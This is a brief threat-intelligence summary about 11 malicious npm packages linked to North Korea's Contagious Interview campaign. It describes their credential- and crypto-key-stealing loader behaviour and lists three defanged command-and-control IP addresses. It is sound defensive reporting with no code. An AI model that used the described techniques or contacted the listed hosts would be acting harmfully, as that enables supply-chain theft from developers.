Socket identifies 11 additional malicious npm packages tied to North Korea’s Contagious Interview operation and Lazarus-linked infrastructure, expanding earlier BeaverTail activity with new RAT loader behavior. The packages impersonated developer utilities, were published through new and previously observed npm accounts, and collectively drew more than 5,600 downloads before most accounts were suspended or reported. Several samples reused C2 infrastructure such as 144.172.87[.]27, 45.61.151[.]71, and 185.153.182[.]241, scanned browser profiles, targeted Solana private-key material, and exfiltrated data over HTTP POST. The campaign also used GitHub and Bitbucket repositories, hex-encoded strings, dynamic payload execution, BeaverTail, and references to InvisibleFerret, reinforcing the supply-chain risk to developers targeted through fake hiring and open-source package ecosystems.